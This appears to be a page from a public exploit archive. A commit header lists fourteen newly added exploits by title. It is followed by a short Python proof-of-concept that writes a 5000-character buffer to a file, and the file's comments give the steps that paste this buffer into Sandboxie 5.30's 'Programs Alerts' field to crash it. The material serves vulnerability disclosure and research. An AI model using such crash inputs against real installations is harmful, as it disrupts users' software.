a91c0acafc
14 changes to exploits/shellcodes Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC) CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC) CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC) WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC) ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC) ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC) Axessh 4.2 - 'Log file name' Denial of Service (PoC) SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service Iperius Backup 6.1.0 - Privilege Escalation VMware Workstation 15.1.0 - DLL Hijacking JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow DeepSound 1.0.4 - SQL Injection Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution
22 lines
No EOL
755 B
Python
Executable file
22 lines
No EOL
755 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Sandboxie 5.30 - Denial of Service (PoC)
|
|
# Date: 16/05/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://www.sandboxie.com
|
|
# Software https://www.sandboxie.com/SandboxieInstall.exe
|
|
# Version: 5.30
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt'
|
|
# 2.- Copy the text from the generated Sandboxie.txt file to clipboard
|
|
# 3.- Open Sandboxie Control
|
|
# 4.- Go to 'Configure' > 'Programs Alerts'
|
|
# 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK'
|
|
# 6.- Click 'OK' and crashed
|
|
|
|
buffer = "\x41" * 5000
|
|
|
|
f = open ("Sandboxie.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |